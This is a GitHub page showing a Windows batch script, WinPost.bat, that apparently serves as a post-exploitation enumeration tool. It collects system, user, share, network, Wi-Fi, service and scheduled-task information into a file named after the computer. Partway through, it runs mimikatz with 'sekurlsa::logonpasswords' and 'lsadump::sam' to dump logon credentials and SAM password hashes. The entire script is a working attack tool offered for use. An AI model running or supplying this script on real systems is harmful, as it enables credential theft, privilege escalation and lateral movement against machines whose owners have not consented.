-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathWinPost.bat
More file actions
72 lines (72 loc) · 982 Bytes
/
WinPost.bat
File metadata and controls
72 lines (72 loc) · 982 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
echo @off
(
echo.
echo ------- SYSTEM INFO -------
echo.
systeminfo
echo.
echo [+] Volumes
echo.
mountvol | find "\"
echo.
echo [+] Shares
echo.
net share
echo.
echo [+] Environment variable
echo.
set
echo.
echo ------- USER INFO -------
echo.
echo %username% || whoami /all
echo.
echo [+] Local users
echo.
net user
echo.
echo [+] Local policy
echo.
net accounts
echo.
echo [+] Local groups
echo.
net localgroup
echo.
echo [+] Dumping hashes
echo.
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
echo.
echo ------- NETWORK INFO -------
echo.
echo [+] IP configuration
echo.
ipconfig /all
echo.
echo [+] Routing table
echo.
route print
echo.
echo [+] ARP table
echo.
arp -a
echo.
echo [+] Connections
echo.
netstat -ano
echo.
echo [+] Wifi
echo.
netsh wlan show profile
echo.
echo ------- PROCESS INFO -------
echo.
echo [+] Services
echo.
tasklist /svc
echo.
echo [+] Scheduled tasks
echo.
schtasks /query /fo LIST /v
echo.
) > %COMPUTERNAME%.txt